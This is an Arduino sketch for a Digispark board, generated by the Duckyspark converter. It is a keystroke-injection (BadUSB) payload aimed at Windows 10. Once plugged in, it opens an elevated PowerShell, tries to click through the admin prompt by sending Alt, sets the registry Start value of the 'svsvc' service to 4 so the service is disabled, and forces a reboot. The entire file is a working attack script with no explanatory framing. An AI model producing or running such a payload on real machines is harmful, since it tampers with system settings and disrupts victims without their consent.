//generated by Duckyspark https://github.com/toxydose/Duckyspark

#include "DigiKeyboard.h"
#define KEY_ESC     41
#define KEY_BACKSPACE 42
#define KEY_TAB     43
#define KEY_PRT_SCR 70
#define KEY_DELETE  76
#define KEY_ARROW_RIGHT 0x4F
#define KEY_ARROW_DOWN  0x51
#define KEY_ARROW_UP    0x52

void setup() {

DigiKeyboard.delay(5000);
DigiKeyboard.sendKeyStroke(0);

// Thank to atomiczsec
// Targets Windows 10
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_R,MOD_GUI_LEFT | 0);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("powershell Start-Process powershell -verb runAs"));
DigiKeyboard.delay(1000);
DigiKeyboard.sendKeyStroke(0,MOD_ALT_LEFT | 0);
DigiKeyboard.delay(1000);
DigiKeyboard.print(F("Set-ItemProperty -Path ")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F("HKLM:")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("SYSTEM")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("CurrentControlSet")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("Services")); DigiKeyboard.print(char(92)); DigiKeyboard.print(F("svsvc")); DigiKeyboard.print(char(34)); DigiKeyboard.print(F(" -Name Start -Value 4 -Force"));
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);
DigiKeyboard.delay(100);
DigiKeyboard.print(F("Restart-Computer -Force"));
DigiKeyboard.sendKeyStroke(KEY_ENTER,0);

}


void loop() {

}
